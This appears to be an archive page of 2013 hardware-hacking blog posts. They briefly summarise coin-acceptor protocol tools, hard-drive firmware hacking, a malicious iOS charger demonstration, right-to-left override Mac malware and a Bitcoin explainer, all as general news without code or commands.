Hacking Coin Collection

August 20, 2013 by Eric Evenchick 36 Comments

Devices that collect coins for payment typically use standardized coin acceptors like the one shown here. These devices use a protocol called ccTalk to let the system know what coins were inserted. [Balda] has built tools for implementing the ccTalk protocol to let you play around with the devices. He also gave a talk at DEF CON (PDF) about the protocol.

[Balda] got started with ccTalk because he wanted to add a coin acceptor to a MAME cabinet, and had a coin acceptor. His latest project converts ccTalk to standard keyboard keystrokes using a Teensy. The MAME cabinet can then interpret these and add to the player’s credits.

There’s two interesting sides to this project. By providing tools to work with ccTalk, it’s much easier to take a used coin acceptor off eBay and integrate it into your own projects. On the other hand, these acceptors are used everywhere, and the tools could allow you to spoof coins, or even change settings on the acceptor.

Just Swipe Your Card And Enter The Pin… What Could Go Wrong?

August 13, 2013 by Mathieu Stephan 48 Comments

We do hope this project makes you shiver.

“Financial risks” is an audiovisual installation that reacts when you swipe your credit card and prints an odd looking receipt if you type in your pin-code. Even though the website contains few technical details (read none) about the build, we chose to feature the project as we find his intent interesting:

‘Financial Risks’ installation is a project designed to present an ironical viewpoint on encoded wallets, as a data input interface invites to overcome fear of impossibility to control spread of confidential information for the sake of curiosity of interaction with an object of art.

The piece consists of 6 bank card readers, a hardware system of sound and video synthesis, a keyboard for pin code entering, a 2-channel sound system and a cash register printer configured to print images. Up to 6 cards simultaneously may be used for playing.

We do hope that nothing is stored in the platform’s memory… but is the installation monitored?

Dead Drop Concept Inspired By [Ender Wiggin] Family

August 3, 2013 by Mike Szczys 9 Comments

encrypted-dead-drop-concept

[Tyler Spilker’s] DDD project is a Digital Dead Drop system based on Python and a Raspberry Pi as a server. It’s pretty rough around the edges at this point — which he freely admits. But we like the concept and figure it might spark an interesting conversation in the comments section.

Now by far our favorite dead drop concept is this USB drive lewdly sticking out of a brick wall. But you actually need to be on-site where this drive is mortared into the wall in order to access it. [Tyler] instead developed a webpage that gives him a text box to enter his messages. These are encrypted using key pairs and pushed to his remote RPi server. This way he can write down his thoughts knowing they’re stored securely and never in danger of being accessed from a lost or stolen cellphone.

If free thought isn’t what you’re trying to transfer from one place to another you probably want something like a Pirate Box.

[Sprite_TM] OHM2013 Talk: Hacking Hard Drive Controller Chips

August 2, 2013 by Mike Szczys 16 Comments

Even if he hadn’t done any firmware hacking on this hard drive [Sprite_TM’s] digital exploration of the controller is fascinating. He gave a talk at this year’s Observe, Hack, Make (OHM2013) — a non-commercial community run event in the Netherlands and we can’t wait for the video. But all the information on how he hacked into the three-core controller chip is included in his write up.

[Sprite_TM] mentions that you’re not going to find datasheets for the controllers on these drives. He got his foot in the door after finding a JTAG pinout mentioned on a forum post. The image above shows his JTAG hardware which he’s controlling with OpenOCD. This led him to discover that there are three cores inside the controller, each used for a different purpose. The difference between [Sprite_TM’s] work and that of mere mortals is that he has a knack for drawing surprisingly accurate conclusions from meager clues. To see what we mean check out the memory map for the second core which he posted on page 3 of his article.

Using JTAG he was able to inject a jump into the code (along with a filler word to keep the checksum valid) and run his own code. To begin the firmware hacking portion of the project he pulled the flash ROM off of the board and installed it on that little board sticking out on the left. This made it easy for him to backup and reflash the chip. Eventually this let him pull off the same proof of concept as a firmware-only hack (no JTAG necessary). He goes onto detail how an attacker who has root access could flash hacked firmware which compromises data without any indication to they system admin or user. But we also like his suggestion that you should try this out on your broken hard drives to see if you can reuse the controllers for embedded projects. That idea is a ton a fun!

When we were poking around the OHM2013 website (linked above) we noticed that the tickets are sold out; good for them! But if you were still able to buy them they take Bitcoin as one payment option. Are there any other conferences that allow Bitcoin for registration?

Blackhat: IOS Device Charger Exploit Installs And Activates Malware

August 1, 2013 by Mike Szczys 31 Comments

ios-charger-malware

A team of researchers from Georgia Tech unveiled their findings yesterday at the Blackhat conference. Their topic is a power charger exploit that installs malware on iOS devices. Who would have thought that there’d be a security hole associated with the charging port on a device? Oh wait, after seeing hotel room locks exploited through their power jack this is an avenue that should be examined with all device security.

The demonstration used a charger and an BeagleBoard. Plugging in the charger is not enough to trigger the exploit, the user must unlock the screen while charging for it to go into action. But once that’s done the game is over. Their demo removes the Facebook app and replaces it with an infected impostor while leaving the icon in the same place on your home screen. They notified Apple of their findings and a patch will roll out with iOS7. So when would you plug your device into an untrusted charger? Their research includes a photo from an airport where an iPad is connected to the USB port of a public charging station.

The summary on the Blackhat site has download icons for the white paper and presentation slides. At the time of writing we had a hard time getting them to download but succeeded after several tries.

Trust Hacking: How The Bitcoin System Works

July 31, 2013 by Mike Szczys 38 Comments

how-bitcoin-network-functions

[Scott Driscoll] sent us a link to his Bitcoin explanation a couple of weeks ago. We glanced at it but moved on rather quickly. It’s been popping up here and there and we finally gave it the time it deserved. This video is interesting in that it doesn’t just focus on what the Bitcoin actually is, but how the Bitcoin system works when it comes time for money to change hands.

Quite early on in the explanation he mentions that “The Bitcoin system is amazingly designed so that no trust is needed”. That’s a powerful statement. For instance, if you sell your car, one of your friends will probably tell you not to take a check. That’s because a check means you’re trusting that the buyer actually has a balance in their account to cover the transaction. With Bitcoin the transaction carries its own proof that the currency is available by including information about the past transactions through which those Bitcoins were acquired.

If you have some idea of what public/private key pairs are you’re already equipped to understand [Scott’s] lecture. After you make it through the 22 minute video maybe you should get down to work doing some Bitcoin mining at home.

Mac Malware Uses Right To Left Character Exploit

July 22, 2013 by Mike Szczys 50 Comments

right-to-left-character-malware-attack

Check out this jumbled confirmation window. At first glance the message appears to contain a bunch of gibberish, but it can actually be read if you start at the right side and read each character moving left. The text displays like this because it is prefixed by a special Right-to-Left override Unicode character. The technique is being used in malware to obscure the actual extension of the file being launched. Notice that when written backwards your eye can still pick out the string “pdf” which may be enough to trick the uninitiated into approving the launch of the file.

This confirmation screen is launched when clicking on a piece of malware found in the wild a little over a week ago. If you do choose to run it, a decoy PDF file is opened in order not to arouse suspicion. But at the same time the program — which is signed with an Apple Developer ID — is installing itself in the home directory and making a cron job to launch at each boot. Sneaky!